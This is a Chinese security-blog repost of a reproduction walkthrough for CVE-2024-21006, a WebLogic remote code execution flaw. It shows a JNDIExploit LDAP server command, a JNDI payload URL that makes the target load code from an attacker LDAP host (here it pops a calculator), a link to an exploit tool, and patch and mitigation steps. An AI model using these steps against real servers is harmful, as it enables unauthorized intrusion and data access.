webLogic远程代码执行利用工具

admin 2024年7月25日09:56:20评论25 views字数 815阅读2分43秒阅读模式

欢迎转发,请勿抄袭

        Oracle WebLogic Server 产品中存在漏洞。受影响的受支持版本为 12.2.1.4.0 和 14.1.1.0.0。易于利用的漏洞允许未经身份验证的攻击者通过 T3、IIOP 进行网络访问来破坏 Oracle WebLogic Server。成功攻击此漏洞可能会导致对关键数据的未经授权的访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。

1

环境搭建

        jdk版本1.8.0_162。

        WebLogic Server 版本: 14.1.1.0.0

2

复现步骤

1、使用 JNDIExploit-1.4-SNAPSHOT.jar利用服务。

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.8.155
webLogic远程代码执行利用工具

2、使用漏洞利用工具weblogic.jar。运行环境在jdk1.8。

webLogic远程代码执行利用工具

3、根据提示填写对应参数。测试payload为弹出计算器

ldap://192.168.8.155:1389/Basic/Command/Base64/Y2FsYy5leGU=
webLogic远程代码执行利用工具

4、发送后检查,ldap请求,成功弹出计算器。

webLogic远程代码执行利用工具

工具获取

https://github.com/dadvlingd/CVE-2024-21006

3

修复方案

1、官方修复方案:

当前官方已发布受影响版本的对应补丁,建议受影响的用户及时更新官方的安全补丁。

链接如下:https://www.oracle.com/security-alerts/cpuapr2024.html

2、临时修复方案:

(1) 用户可通过控制T3协议的访问来临时阻断针对利用T3协议漏洞的攻击。

(2) 用户可通过关闭IIOP协议阻断针对利用IIOP协议漏洞的攻击。

文章声明:该工具、教程仅供学习参考,请勿非法使用。严谨未授权攻击!否则与作者无关!

 

原文始发于微信公众号(yudays实验室):webLogic远程代码执行利用工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月25日09:56:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   webLogic远程代码执行利用工具https://cn-sec.com/archives/2996969.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息